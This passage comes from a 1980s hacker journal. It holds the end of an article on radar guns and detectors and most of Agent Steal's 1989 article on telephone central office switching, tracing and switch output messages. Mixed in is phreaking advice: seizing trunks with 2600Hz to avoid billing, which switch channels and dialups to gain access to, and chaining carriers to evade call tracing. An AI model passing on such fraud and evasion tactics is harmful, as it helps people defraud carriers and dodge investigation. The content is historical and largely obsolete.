out, then he/she will have a functional high powered gun. If this small
|
|||
|
wattage does not satisfy you, you may have to purchase a separate amplifier
|
|||
|
for the gun, and have it wired directly into the radar's transmitter antenna.
|
|||
|
This modification is expensive not to mention illegal, but then again what the
|
|||
|
hell isn't these days. I have seen six different types of guns offered from
|
|||
|
National Radar Exchange. The following are a few major radar gun
|
|||
|
manufacturers that are sold out of most radar shops. They are:
|
|||
|
|
|||
|
KUSTOM SIGNAL:
|
|||
|
Kustom Signal HR-12 K Band 100mw signal 2000-3000 foot maximum range $695.00
|
|||
|
Kustom Signal HR-8 K Band 100mw signal 1800-3000 foot maximum range $495.00
|
|||
|
|
|||
|
CMI INC.:
|
|||
|
Speedgun One X Band 100mw signal 1000-2500 foot maximum range $395.00
|
|||
|
Speedgun Six X Band 100mw signal 1000-2500 foot maximum range $495.00
|
|||
|
(Since these units are the same, the only differences are things like
|
|||
|
last speed reading recall, 10 number memory, etc.)
|
|||
|
|
|||
|
MPH INC.:
|
|||
|
|
|||
|
MPH K-55 X Band 40mw signal 1200-2500 foot maximum range $495.00
|
|||
|
(Can clock target in 1/2 second, which is exceptionally fast for radar guns)
|
|||
|
|
|||
|
The only differences between the models are their bands and their options,
|
|||
|
such as a "HOLD" button, last speed recorded etc.
|
|||
|
|
|||
|
I have found these to be some of the top units in the radar detector world
|
|||
|
currently and are listed as follows:
|
|||
|
|
|||
|
MOST SENSITIVE MOST FEATURES BEST LOOKING MOST RELIABLE SMALLEST
|
|||
|
-------------- ------------- ------------ ------------- -------------
|
|||
|
COBRA 4120 COBRA 4120 Whistler 3SE ESCORT Uniden RD-9XL
|
|||
|
BEL 944 COBRA 3160 BELL 944 K40 Whistler 3SE
|
|||
|
Snooper 6000 BELL 944 Uniden RD-9XL
|
|||
|
|
|||
|
BEST VALUE LOUDEST BEST FILTERED
|
|||
|
------------ -------------- ------------------
|
|||
|
Snooper 4000 COBRA 5110 Snooper 6000
|
|||
|
Cobra 5110 COBRA 3120 Other Snoopers
|
|||
|
Cobra 3168 Whistler Q2002
|
|||
|
Maxon RD25
|
|||
|
|
|||
|
I did not get to see Cincinnati Microwave's new "SOLO", nor BEL's
|
|||
|
"Vector 3", "Express", nor it's newer "Legend 3."
|
|||
|
|
|||
|
Just because a detector is the MOST sensitive doesn't mean it is the best
|
|||
|
detector. Because of the sensitivity you could pick up more alarms. What
|
|||
|
you want is a detector with excellent sensitivity, but good anti-falsing
|
|||
|
circuitry.
|
|||
|
|
|||
|
I hope this article has given you some insight on how radars work and
|
|||
|
how their tickets CAN be defeated. Keep safe and sane,
|
|||
|
|
|||
|
Professor Falken
|
|||
|
Legion Of Doom
|
|||
|
|
|||
|
|
|||
|
<EOF>
|
|||
|
The LOD/H Technical Journal, Issue #4: File 04 of 10
|
|||
|
|
|||
|
|
|||
|
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
|||
|
$ $
|
|||
|
$ Central Office Operations $
|
|||
|
$ Western Electric 1ESS,1AESS, $
|
|||
|
$ The end office network environment $
|
|||
|
$ $
|
|||
|
$ Written by Agent Steal 1989 $
|
|||
|
$ $
|
|||
|
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
|||
|
|
|||
|
|
|||
|
Topics covered in this article will be:
|
|||
|
|
|||
|
Call tracing
|
|||
|
RCMAC
|
|||
|
Input/output messages
|
|||
|
SCC and SCCS
|
|||
|
COSMOS and LMOS
|
|||
|
BLV, (REMOB) and "No test trunks"
|
|||
|
Recent change messages
|
|||
|
Equal Access
|
|||
|
|
|||
|
Did I get your attention? Good, everyone should read this. With the time,
|
|||
|
effort, and balls it has taken me compile this knowledge it is certainly worth
|
|||
|
your time. I hope you appreciate me taking the time to write this.
|
|||
|
|
|||
|
I should point out that the information in this article is correct to the
|
|||
|
best of my knowledge. I'm sure there are going to be people that disagree
|
|||
|
with me on some of it, particularly the references to tracing. However, I
|
|||
|
have been involved in telecommunications and computers for 12+ years.
|
|||
|
|
|||
|
I'm basing this article around the 1AESS since it is the most common
|
|||
|
switch in use today.
|
|||
|
|
|||
|
|
|||
|
** OUTSIDE PLANT **
|
|||
|
|
|||
|
This is the wiring between your telephone and the central office. That is
|
|||
|
another topic in itself. If you are interested read Phucked Agent 04's article
|
|||
|
on The Outside Loop Distribution Plant (OLDP) in the LOD/H Technical Journal,
|
|||
|
Issue #1. The article explains those green boxes you see on street corners,
|
|||
|
aerial cables, manholes etc. So where that article stops, this one starts.
|
|||
|
|
|||
|
|
|||
|
** CABLE VAULT **
|
|||
|
|
|||
|
All of the cables from other offices and from subscribers enter the
|
|||
|
central office underground. They enter into a room called the cable vault.
|
|||
|
This is a room generally in the basement located at one end or another of the
|
|||
|
building. The width of the room varies but runs the entire length of the
|
|||
|
building. Outside cables appear through holes in the wall. The cables then run
|
|||
|
up through holes in the ceiling to the frame room.
|
|||
|
|
|||
|
Understand that each of these cables consist of an average of 3600 pairs
|
|||
|
of wires. That's 3600 telephone lines. The amount of cables obviously depends
|
|||
|
on the size of the office. All cables (e.g. interoffice, local lines, fiber
|
|||
|
optic, coaxial) enter through the cable vault.
|
|||
|
|
|||
|
|
|||
|
** FRAME ROOM **
|
|||
|
|
|||
|
The frame is where the cable separates into individual pairs and attach
|
|||
|
to connectors. The frame runs the length of the building, from floor to
|
|||
|
ceiling. There are two sides to the frame, the horizontal side and the
|
|||
|
vertical side. The vertical side is where the outside wiring attaches and the
|
|||
|
protector fuses reside. The horizontal side is where the connectors to the
|
|||
|
switching system reside. Multi-conductor cables run from the connectors to
|
|||
|
actual switching equipment. So what we have is a large frame called the Main
|
|||
|
Distribution Frame (MDF) running the entire length of the building. From floor
|
|||
|
to ceiling it is 5 feet thick. The MDF consists of two sides, the VDF and the
|
|||
|
HDF. Cables from outside connect on one side and cables from the switching
|
|||
|
equipment connect to the other side and jumper wires connect the two. This way
|
|||
|
any piece of equipment can be connected to any incoming "cable pair". These
|
|||
|
jumper wires are simply 2 conductor twisted pair, running between the VDF and
|
|||
|
the HDF.
|
|||
|
|
|||
|
What does all this mean? Well if you had access to COSMOS you would see
|
|||
|
information regarding cable and pair and "OE" (Office Equipment). With this
|
|||
|
information you could find your line on the frame and on the switch. The VDF
|
|||
|
side is clearly marked by cable and pair at the top of the frame, however the
|
|||
|
HDF side is a little more complicated and varies in format from frame to frame
|
|||
|
and from switch to switch. Since I am writing this article around the 1AESS,
|
|||
|
I will describe the OE format used for that switch.
|
|||
|
|
|||
|
OE ABB-CDD-EFF
|
|||
|
|
|||
|
Where..
|
|||
|
|
|||
|
A = Control Group (when more than one switch exists in that C.O.)
|
|||
|
B = LN Line Link Network
|
|||
|
C = LS Line Switching Frame
|
|||
|
D = CONC or CONCentrator
|
|||
|
E = Switch (individual, not the big one)
|
|||
|
F = Level
|
|||
|
|
|||
|
There is one more frame designation called LOC or LOCation. This gives the
|
|||
|
location of the connector block on the HDF side. Very simply, looking at the
|
|||
|
frame:
|
|||
|
|
|||
|
|
|||
|
H ---------------------------------------------------------------------
|
|||
|
|
|||
|
G ---------------------------------------------------------------------
|
|||
|
|
|||
|
F ---------------------------------------------------------------------
|
|||
|
|
|||
|
E ---------------------------------------------------------------------
|
|||
|
|
|||
|
D ---------------------------------------------------------------------
|
|||
|
|
|||
|
C ---------------------------------------------------------------------
|
|||
|
|
|||
|
B ---------------------------------------------------------------------
|
|||
|
|
|||
|
A ---------------------------------------------------------------------
|
|||
|
|
|||
|
123456789 etc.
|
|||
|
|
|||
|
Please note that what you are looking at here represents the HDF side of
|
|||
|
the MDF, being up to 100 feet long, and 20 feet high. Each "-" represents a
|
|||
|
connector block containing connections for 4 x 24 (which is 96) pairs.
|
|||
|
|
|||
|
So far I've covered how the wires get from you to the switching
|
|||
|
equipment. Now we get to the switching system itself.
|
|||
|
|
|||
|
|
|||
|
** SWITCHING SYSTEMS **
|
|||
|
|
|||
|
Writing an article that covers them all would be lengthy indeed. So I am
|
|||
|
only going to list the major ones and a brief description of each.
|
|||
|
|
|||
|
- Step by Step
|
|||
|
Strowger 1889
|
|||
|
First automatic, required no operators for local calls
|
|||
|
No custom calling or touch tone
|
|||
|
Manufactured by many different companies in different versions
|
|||
|
Hard wire routing instructions, could not choose an alternate route if
|
|||
|
programed route was busy
|
|||
|
Each dial pulse tripped a "stepper" type relay to find its path
|
|||
|
|
|||
|
- No.1 Crossbar 1930
|
|||
|
- No.5 Crossbar 1947 (faster, more capacity)
|
|||
|
Western Electric
|
|||
|
First ability to find idle trunks for call routing
|
|||
|
No custom calling, or equal access
|
|||
|
Utilized 10x20 cross point relay switches
|
|||
|
Hard wired common control logic for program control
|
|||
|
Also copied by other manufactures
|
|||
|
|
|||
|
- No.4 Crossbar
|
|||
|
Used as a toll switch for AT&T's long lines network
|
|||
|
4 wire tandem switching
|
|||
|
Not usually used for local loop switching
|
|||
|
|
|||
|
- No.1ESS 1966
|
|||
|
- No.1AESS 1973
|
|||
|
Western Electric
|
|||
|
Described in detail later
|
|||
|
|
|||
|
- No.1EAX
|
|||
|
GTE Automatic Electric
|
|||
|
GTE's version of the 1AESS
|
|||
|
Slower and louder
|
|||
|
|
|||
|
- No.2ESS 1967
|
|||
|
- No.2BESS 1974
|
|||
|
Western Electric
|
|||
|
Analog switching under digital control
|
|||
|
Very similar to the No.1ESS and No.1AESS
|
|||
|
Downsized for smaller applications
|
|||
|
|
|||
|
_ No.3ESS
|
|||
|
Western Electric
|
|||
|
Analog switching under digital control
|
|||
|
Even smaller version of No.1AESS
|
|||
|
Rural applications for up to 4500 lines
|
|||
|
|
|||
|
- No.2EAX
|
|||
|
GTE Automatic Electric
|
|||
|
Smaller version of 1EAX
|
|||
|
Analog switch under digital control
|
|||
|
|
|||
|
- No.4ESS
|
|||
|
Western Electric
|
|||
|
Toll switch, 4 wire tandem
|
|||
|
Digital switching
|
|||
|
Uses the 1AESS processor
|
|||
|
|
|||
|
- No.3EAX
|
|||
|
Gee is there a pattern here? No GTE
|
|||
|
Digital Toll switch
|
|||
|
4 wire tandem switching
|
|||
|
|
|||
|
- No.5ESS
|
|||
|
AT&T Network Systems
|
|||
|
Full scale computerized digital switching
|
|||
|
ISDN compatibility
|
|||
|
Utilizes time sharing technology
|
|||
|
Toll or end office
|
|||
|
|
|||
|
- DMS 100 Digital Matrix Switch
|
|||
|
Northern Telecom
|
|||
|
Similar to 5ESS
|
|||
|
Runs slower
|
|||
|
Considerably less expensive
|
|||
|
|
|||
|
- DMS 200
|
|||
|
Toll and Access Tandem
|
|||
|
Optional operator services
|
|||
|
|
|||
|
- DMS 250
|
|||
|
Toll switch designed for common carriers
|
|||
|
|
|||
|
- DMS 300
|
|||
|
Toll switch for international gateways
|
|||
|
|
|||
|
- No.5EAX
|
|||
|
GTE Automatic Electric
|
|||
|
Same as above
|
|||
|
|
|||
|
How much does a switch cost? A fully equipped 5ESS for a 40,000
|
|||
|
subscriber end office can cost well over 3 million dollars. Now you know why
|
|||
|
your phone bill is so much. Well...maybe you parents bill.
|
|||
|
|
|||
|
|
|||
|
** The 1ESS and 1AESS **
|
|||
|
|
|||
|
This was the first switch of it's type put into widespread use by Bell.
|
|||
|
Primarily an analog switch under digital control, the switch is no longer
|
|||
|
being manufactured. The 1ESS has been replaced by the 5ESS and other full
|
|||
|
scale digital switches, however, it is still by far the most common switch
|
|||
|
used in today's Class 5 end offices.
|
|||
|
|
|||
|
The #1 and 1A use a crosspoint matrix similar to the X-bar. The primary
|
|||
|
switch used in the matrix is the ferreed (remreed in the 1A). It is a two
|
|||
|
state magnetic alloy switch. It is basically a magnetic switch that does not
|
|||
|
require voltage to stay in it's present position. A voltage is only required
|
|||
|
to change the state of the switch.
|
|||
|
|
|||
|
The No. 1 utilized a computer style, common control and memory. Memory
|
|||
|
used by the #1 changed with technology, but most have been upgraded to RAM.
|
|||
|
Line scanners monitor the status of customer lines, crosspoint switches,
|
|||
|
and all internal, outgoing, and incoming trunks, reporting their status to
|
|||
|
the central control. The central control then either calls upon program or
|
|||
|
call store memories to chose which crosspoints to activate for processing the
|
|||
|
call. The crosspoint matrices are controlled via central pulse distributors
|
|||
|
which in turn are controlled by the central control via data buses. All of
|
|||
|
the scanner's AMA tape controllers, pulse distro, x-point matrix, etc., listen
|
|||
|
to data buses for their address and command or report their information on
|
|||
|
the buses. The buses are merely cables connecting the different units to the
|
|||
|
central control.
|
|||
|
|
|||
|
The 1E was quickly replaced by the 1A due to advances in technology. So
|
|||
|
1A's are more common, also many of the 1E's have been upgraded to a 1A.
|
|||
|
This meant changing the ferreed to the remreed relay, adding additional
|
|||
|
peripheral component controllers (to free up central controller load) and
|
|||
|
implementation of the 1A processor. The 1A processor replaced older style
|
|||
|
electronics with integrated circuits. Both switches operate similarly.
|
|||
|
The primary differences were speed and capacity. The #1ESS could process
|
|||
|
110,000 calls per hour and serve 128,000 lines.
|
|||
|
|
|||
|
Most of the major common control elements are either fully or partially
|
|||
|
duplicated to ensure reliability. Systems run simultaneously and are checked
|
|||
|
against each other for errors. When a problem occurs the system will double
|
|||
|
check, reroute, or switch over to auxiliary to continue system operation.
|
|||
|
Alarms are also reported to the maintenance console and are in turn printed
|
|||
|
out on a printer near the control console.
|
|||
|
|
|||
|
Operation of the switch is done through the Master Control Center (MCC)
|
|||
|
panel and/or a terminal. Remote operation is also done through input/output
|
|||
|
channels. These channels have different functions and therefore receive
|
|||
|
different types of output messages and have different abilities as for what
|
|||
|
type of commands they are allowed to issue. Here is a list of the commonly
|
|||
|
used TTY channels.
|
|||
|
|
|||
|
Maintenance - Primary channel for testing, enable, disable etc.
|
|||
|
Recent Change - Changes in class of service, calling features etc.
|
|||
|
Administrative - Traffic information and control
|
|||
|
Supplementary - Traffic information supplied to automatic network control
|
|||
|
SCC Maint. - Switching Control Center interface
|
|||
|
Plant Serv.Cent.- Reports testing information to test facilities
|
|||
|
|
|||
|
At the end of this article you will find a list of the most frequently
|
|||
|
seen Maintenance channel output messages and a brief description of their
|
|||
|
meaning. You will also find a list of frequently used input messages.
|
|||
|
|
|||
|
There are other channels as well as back ups but the only ones to be
|
|||
|
concerned with are Recent Change and SCC maint. These are the two channels
|
|||
|
you will most likely want to get access to. The Maintenance channel doesn't
|
|||
|
leave the C.O. and is used by switch engineers as the primary way of
|
|||
|
controlling the switch. During off hours and weekends the control of the
|
|||
|
switch is transferred to the SCC.
|
|||
|
|
|||
|
The SCC is a centrally located bureau that has up to 16 switches
|
|||
|
reporting to it via their SCC maint. channel. The SCC has a mini computer
|
|||
|
running SCCS that watches the output of all these switches for trouble
|
|||
|
conditions that require immediate attention. The SCC personnel then have the
|
|||
|
ability to input messages to that particular switch to try and correct the
|
|||
|
problem. If necessary, someone will be dispatched to the C.O. to correct the
|
|||
|
problem. I should also mention that the SCC mini, SCCS has dialups and access
|
|||
|
to SCCS means access to all the switches connected to it. The level of access
|
|||
|
however, may be dependent upon the privileges of the account you are using.
|
|||
|
|
|||
|
The Recent Change channels also connect to a centrally located bureau
|
|||
|
referred to as the RCMAC. These bureaus are responsible for activating lines,
|
|||
|
changing class of service etc. RCMAC has been automated to a large degree by
|
|||
|
computer systems that log into COSMOS and look for pending orders. COSMOS is
|
|||
|
basically an order placement and record keeping system for central office
|
|||
|
equipment, but you should know that already, right? So this system, called
|
|||
|
Work Manager running MIZAR logs into COSMOS, pulls orders requiring recent
|
|||
|
change work, then in one batch several times a day, transmits the orders to
|
|||
|
the appropriate switch via it's Recent Change Channel.
|
|||
|
|
|||
|
Testing of the switch is done by many different methods. Bell Labs has
|
|||
|
developed a number of systems, many accomplishing the same functions. I will
|
|||
|
only attempt to cover the ones I know fairly well.
|
|||
|
|
|||
|
The primary testing system is the trunk test panels located at the switch
|
|||
|
itself. There are three and they all pretty much do the same thing, which is
|
|||
|
to test trunk and line paths through the switch.
|
|||
|
|
|||
|
Trunk and Line Test Panel
|
|||
|
Supplementary Trunk Test Panel
|
|||
|
Manual Trunk Test Panel
|
|||
|
|
|||
|
MLT (Mechanized Loop Testing) is another popular one. This system is
|
|||
|
often available through the LMOS data base and can give very specific
|
|||
|
measurements of line levels and losses. The "TV Mask" is also popular giving
|
|||
|
the user the ability to monitor lines via a call back number.
|
|||
|
|
|||
|
DAMT (Direct Access Mechanized Testing) is used by line repairmen to put
|
|||
|
tone on numbers to help them find lines. This was previously done by Frame
|
|||
|
personnel, so DAMT automated that task. DAMT can also monitor lines, but
|
|||
|
unfortunately, the audio is scrambled in a manor that allows one only to tell
|
|||
|
what type of signal is present on the line, or whether it is busy or not.
|
|||
|
|
|||
|
All of these testing systems have one thing in common: they access the
|
|||
|
line through a "No Test Trunk". This is a switch which can drop in on a
|
|||
|
specific path or line and connect it to the testing device. It depends on
|
|||
|
the device connected to the trunk, but there is usually a noticeable "click"
|
|||
|
heard on the tested line when the No Test Trunk drops in. Also the testing
|
|||
|
devices I have mentioned here will seize the line, busying it out. This will
|
|||
|
present problems when trying to monitor calls, as you would need to drop in
|
|||
|
during the call. The No Test Trunk is also the method in which operator
|
|||
|
consoles perform verifications and interrupts.
|
|||
|
|
|||
|
|
|||
|
** INTEROFFICE SIGNALLING **
|
|||
|
|
|||
|
Calls coming into and leaving the switch are routed via trunks. The
|
|||
|
switches select which trunk will route the call most effectively and then
|
|||
|
retransmits the dialed number to the distant switch. There are several
|
|||
|
different ways this is done. The two most common are Loop Signaling and CCIS,
|
|||
|
Common Channel Interoffice Signaling. The predecessor to both of these is the
|
|||
|
famous and almost extinct "SF Signaling". This utilized the presence of
|
|||
|
2600hz to indicate trunks in use. If one winks 2600Hz down one of these
|
|||
|
trunks, the distant switch would think you hung up. Remove the 2600, and you
|
|||
|
have control of the trunk and you could then MF a number. This worked great
|
|||
|
for years. Assuming you had dialed a toll free number to begin with, there
|
|||
|
was no billing generated at all. The 1AESS does have a program called SIGI
|
|||
|
that looks for any 2600 winks after the original connection of a toll call.
|
|||
|
It then proceeds to record on AMA and output any MF digits received. For more
|
|||
|
information on AMA see Phantom Phreaker's article entitled, Understanding
|
|||
|
Automatic Message Accounting in the LOD/H TJ Issue #3. However due to many
|
|||
|
long distant carriers using signaling that can generate these messages it is
|
|||
|
often overlooked and "SIG IRR" output messages are quite common.
|
|||
|
|
|||
|
Loop signaling still uses MF to transmit the called number to distant
|
|||
|
switches, however, the polarity of the voltage on the trunk is reversed to
|
|||
|
indicate trunk use.
|
|||
|
|
|||
|
CCIS sometimes referred to CCS#6 uses a separate data link sending
|
|||
|
packets of data containing information regarding outgoing calls. The distant
|
|||
|
switch monitors the information and connects the correct trunk to the correct
|
|||
|
path. This is a faster and more efficient way of call processing and is being
|
|||
|
implemented everywhere. The protocol that AT&T uses is CCS7 and is currently
|
|||
|
being accepted as the industry standard. CCS6 and CCS7 are somewhat similar.
|
|||
|
|
|||
|
Interoffice trunks are multiplexed together onto one pair. The standard
|
|||
|
is 24 channels per pair. This is called T-1 in it's analog format and D-1
|
|||
|
in its digital format. This is often referred to as carrier or CXR. The terms
|
|||
|
frame error and phase jitter are part of this technology which is often a
|
|||
|
world in itself. This type of transmission is effective for only a few miles
|
|||
|
on twisted pair. It is often common to see interoffice repeaters in manholes
|
|||
|
or special huts. Repeaters can also be found within C.O.s, amplifying trunks
|
|||
|
between offices. This equipment is usually handled by the "carrier" room,
|
|||
|
often located on another floor. Carrier also handles special circuits, private
|
|||
|
lines, and foreign exchange circuits.
|
|||
|
|
|||
|
After a call reaches a Toll Switch, the transmit and receive paths of
|
|||
|
the calling and called party are separated and transmitted on separate
|
|||
|
channels. This allows better transmission results and allows more calls to
|
|||
|
be placed on any given trunk. This is referred to as 4 wire switching. This
|
|||
|
also explains why during a call, one person can hear crosstalk and the other
|
|||
|
cannot. Crosstalk will bleed over from other channels onto the multiplexed
|
|||
|
T-Carrier transmission lines used between switches.
|
|||
|
|
|||
|
|
|||
|
** CALL TRACING
|
|||
|
|
|||
|
So with the Loop Signaling standard format there is no information being
|
|||
|
transmitted regarding the calling number between switches. This therefore
|
|||
|
causes the call tracing routine to be at least a two step process. This is
|
|||
|
assuming that you are trying to trace an anticipated call, not one in
|
|||
|
progress. When call trace "CLID" is placed on a number, a message is output
|
|||
|
every time someone calls that number. The message shows up on most of the ESS
|
|||
|
output channels and gives information regarding the time and the number of the
|
|||
|
incoming trunk group. If the call came from within that office, then the
|
|||
|
calling number is printed in the message. Once the trunk group is known, it
|
|||
|
can usually be determined what C.O. the calls are coming from. This is also
|
|||
|
assuming that the calls are coming from within that Bell company and not
|
|||
|
through a long distance carrier (IEC). So if Bell knows what C.O. the calls
|
|||
|
are coming from, they simply put the called number on the C.I. list of that
|
|||
|
C.O. Anytime anyone in that C.O. calls the number in question another message
|
|||
|
is generated showing all the pertinent information.
|
|||
|
|
|||
|
Now if this were a real time trace it would only require the assistance
|
|||
|
of the SCC and a few commands sent to the appropriate switches (i.e.
|
|||
|
NET-LINE). This would give them the path and trunk group numbers of the call
|
|||
|
in progress. Naturally the more things the call is going through, the more
|
|||
|
people that will need to be involved in the trace. There seems to be a common
|
|||
|
misconception about the ability to trace a call through some of the larger
|
|||
|
packet networks i.e. Telenet and TYMNET. Well I can assure you, they can
|
|||
|
track a call through their network in seconds (assuming multiple systems
|
|||
|
and/or network gateways are not used) and then all that is needed is the
|
|||
|
cooperation of the Bell companies. Call tracing in itself it not that
|
|||
|
difficult these days. What is difficult is getting the different organizations
|
|||
|
together to cooperate. You have to be doing something relatively serious to
|
|||
|
warrant tracing in most cases, however, not always. So if tracing is a
|
|||
|
concern, I would recommend using as many different companies at one time as
|
|||
|
you think is necessary, especially US Sprint, since they can't even bill
|
|||
|
people on time much less trace a call. But...it is not recommended to call
|
|||
|
Sprint direct, more on that in the Equal Access section.
|
|||
|
|
|||
|
|
|||
|
** EQUAL ACCESS
|
|||
|
|
|||
|
The first thing you need to understand is that every IEC Inter Exchange
|
|||
|
Carrier (long distance company) needs to have an agreement with every LEC
|
|||
|
Local Exchange Carrier (your local phone company) that they want to have
|
|||
|
access to and from. They have to pay the LEC for the type of service they
|
|||
|
receive and the amount of trunks, and trunk use. The cost is high and the
|
|||
|
market is a zoo. The LECs have the following options:
|
|||
|
|
|||
|
- Feature Group A -
|
|||
|
|
|||
|
This was the first access form offered to the IECs by the LECs. Basically
|
|||
|
whenever you access an IEC by dialing a regular 7 digit number (POTS line)
|
|||
|
this is FGA. The IECs' equipment would answer the line and interpret your
|
|||
|
digits and route your call over their own network. Then they would pick up an
|
|||
|
outgoing telephone line in the city you were calling and dial your number
|
|||
|
locally. Basically a dial in, dial out situation similar to Telenet's
|
|||
|
PC pursuit service.
|
|||
|
|
|||
|
- Feature Group B -
|
|||
|
|
|||
|
FGB is 950-xxxx. This is a very different setup from FGA. When you dial
|
|||
|
950, your local switch routes the call to the closest Access Tandem (AT) (Toll
|
|||
|
Switch) in your area. There the IECs have direct trunks connected between the
|
|||
|
AT and their equipment. These trunks usually use a form of multiplexing like
|
|||
|
T-1 carrier with wink start (2600Hz). On the incoming side, calls coming in
|
|||
|
from the IEC are basically connected the same way. The IEC MFs into the AT
|
|||
|
and the AT then connects the calls. There are many different ways FGB is
|
|||
|
technically setup, but this is the most common.
|
|||
|
|
|||
|
Tracing on 950 calls has been an area of controversy and I would like to
|
|||
|
clear it up. The answer is yes, it is possible. But like I mentioned earlier,
|
|||
|
it would take considerable manpower which equals expensive to do this. It
|
|||
|
also really depends on how the IEC interface is set up. Many IECs have
|
|||
|
trunks going directly to Class 5 end offices. So, if you are using a small
|
|||
|
IEC, and they figure out what C.O. you are calling from, it wouldn't be out
|
|||
|
of the question to put CLID on the 950 number. This is highly unlikely and I
|
|||
|
have not heard from reliable sources of it ever being done. Remember, CLID
|
|||
|
generates a message every time a call is placed to that number. Excessive
|
|||
|
call trace messages can crash a switch. However, I should mention that brute
|
|||
|
force hacking of 950s is easily detected and relatively easy to trace. If the
|
|||
|
IEC is really having a problem in a particular area they will pursue it.
|
|||
|
|
|||
|
- Feature Group C -
|
|||
|
|
|||
|
FGC is reserved for and used exclusively by AT&T.
|
|||
|
|
|||
|
- Feature Group D -
|
|||
|
FGD is similar to FGB with the exception that ANI is MF'ed to the IEC.
|
|||
|
The end office switch must have Equal Access capability in order to transmit
|
|||
|
the ANI. Anything above a X-bar can have it. FGD can only be implemented on
|
|||
|
800 numbers and if an IEC wants it, they have to buy the whole prefix. For a
|
|||
|
list of FGD prefixes see 2600 Magazine. You should also be aware that MCI,
|
|||
|
Sprint, and AT&T are offering a service where they will transmit the ANI to
|
|||
|
the customer as well. You will find this being used as a security or
|
|||
|
marketing tool by an increasing amount of companies. A good example would be
|
|||
|
800-999-CHAT.
|
|||
|
|
|||
|
|
|||
|
** OUTPUT MESSAGES **
|
|||
|
|
|||
|
The following is a compiled list of common switch messages. The list was
|
|||
|
compiled from various reference materials that I have at my disposal.
|
|||
|
|
|||
|
|
|||
|
1AESS COMMON OUTPUT MESSAGES
|
|||
|
--------------------------------------
|
|||
|
|
|||
|
MSG. DESCRIPTION
|
|||
|
----------------------------------------------------------------
|
|||
|
** ALARM **
|
|||
|
|
|||
|
AR01 Office alarm
|
|||
|
AR02 Alarm retired or transferred
|
|||
|
AR03 Fuse blown
|
|||
|
AR04 Unknown alarm scan point activated
|
|||
|
AR05 Commercial power failure
|
|||
|
AR06 Switchroom alarm via alarm grid
|
|||
|
AR07 Power plant alarm
|
|||
|
AR08 Alarm circuit battery loss
|
|||
|
AR09 AMA bus fuse blown
|
|||
|
AR10 Alarm configuration has been changed (retired,inhibited)
|
|||
|
AR11 Power converter trouble
|
|||
|
AR13 Carrier group alarm
|
|||
|
AR15 Hourly report on building and power alarms
|
|||
|
|
|||
|
** AUTOMATIC TRUNK TEST **
|
|||
|
AT01 Results of trunk test
|
|||
|
|
|||
|
** CARRIER GROUP **
|
|||
|
CG01 Carrier group in alarm
|
|||
|
CG03 Reason for above
|
|||
|
|
|||
|
** COIN PHONE **
|
|||
|
CN02 List of pay phones with coin disposal problems
|
|||
|
CN03 Possible Trouble
|
|||
|
CN04 Phone taken out of restored service because of possible coin fraud
|
|||
|
|
|||
|
** COPY **
|
|||
|
COPY Data copied from one address to another
|
|||
|
|
|||
|
** CALL TRACE **
|
|||
|
CT01 Manually requested trace line to line, information follows
|
|||
|
CT02 Manually requested trace line to trunk, information follows
|
|||
|
CT03 Intraoffice call placed to a number with CLID
|
|||
|
CT04 Interoffice call placed to a number with CLID
|
|||
|
CT05 Call placed to number on the CI list
|
|||
|
CT06 Contents of the CI list
|
|||
|
CT07 ACD related trace
|
|||
|
CT08 ACD related trace
|
|||
|
CT09 ACD related trace
|
|||
|
|
|||
|
** DIGITAL CARRIER TRUNK **
|
|||
|
DCT COUNTS Count of T carrier errors
|
|||
|
|
|||
|
** MEMORY DIAGNOSTICS **
|
|||
|
DGN Memory failure in cs/ps diagnostic program
|
|||
|
|
|||
|
** DIGITAL CARRIER "FRAME" ERRORS **
|
|||
|
FM01 DCT alarm activated or retired
|
|||
|
FM02 Possible failure of entire bank not just frame
|
|||
|
FM03 Error rate of specified digroup
|
|||
|
FM04 Digroup out of frame more than indicated
|
|||
|
FM05 Operation or release of the loop terminal relay
|
|||
|
FM06 Result of digroup circuit diagnostics
|
|||
|
FM07 Carrier group alarm status of specific group
|
|||
|
FM08 Carrier group alarm count for digroup
|
|||
|
FM09 Hourly report of carrier group alarms
|
|||
|
FM10 Public switched digital capacity failure
|
|||
|
FM11 PUC counts of carrier group errors
|
|||
|
|
|||
|
** MAINTENANCE **
|
|||
|
MA02 Status requested, print out of MACII scratch pad
|
|||
|
MA03 Hourly report of system circuits and units in trouble
|
|||
|
MA04 Reports condition of system
|
|||
|
MA05 Maintenance interrupt count for last hour
|
|||
|
MA06 Scanners,network and signal distributors in trouble
|
|||
|
MA07 Successful switch of duplicated unit (program store etc.)
|
|||
|
MA08 Excessive error rate of named unit
|
|||
|
MA09 Power should not be removed from named unit
|
|||
|
MA10 OK to remove paper
|
|||
|
MA11 Power manually removed from unit
|
|||
|
MA12 Power restored to unit
|
|||
|
MA13 Indicates central control active
|
|||
|
MA15 Hourly report of # of times interrupt recovery program acted
|
|||
|
MA17 Centrex data link power removed
|
|||
|
MA21 Reports action taken on MAC-REX command
|
|||
|
MA23 4 minute report, emergency action phase triggers are inhibited
|
|||
|
|
|||
|
** MEMORY **
|
|||
|
MN02 List of circuits in trouble in memory
|
|||
|
|
|||
|
** NETWORK TROUBLE **
|
|||
|
NT01 Network frame unable to switch off line after fault detection
|
|||
|
NT02 Network path trouble Trunk to Line
|
|||
|
NT03 Network path trouble Line to Line
|
|||
|
NT04 Network path trouble Trunk to Trunk
|
|||
|
NT06 Hourly report of network frames made busy
|
|||
|
NT10 Network path failed to restore
|
|||
|
|
|||
|
** OPERATING SYSTEM STATUS **
|
|||
|
OP:APS-0
|
|||
|
OP:APSTATUS
|
|||
|
OP:CHAN
|
|||
|
OP:CISRC Source of critical alarm, automatic every 15 minutes
|
|||
|
OP:CSSTATUS Call store status
|
|||
|
OP:DUSTATUS Data unit status
|
|||
|
OP:ERAPDATA Error analysis database output
|
|||
|
OP:INHINT Hourly report of inhibited devices
|
|||
|
OP:LIBSTAT List of active library programs
|
|||
|
OP:OOSUNITS Units out of service
|
|||
|
OP:PSSTATUS Program store status
|
|||
|
|
|||
|
** PLANT MEASUREMENTS **
|
|||
|
PM01 Daily report
|
|||
|
PM02 Monthly report
|
|||
|
PM03 Response to a request for a specific section of report
|
|||
|
PM04 Daily summary of IC/IEC irregularities
|
|||
|
|
|||
|
** REPORT **
|
|||
|
REPT:ADS FUNCTION Reports that a ADS function is about to occur
|
|||
|
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
|
|||
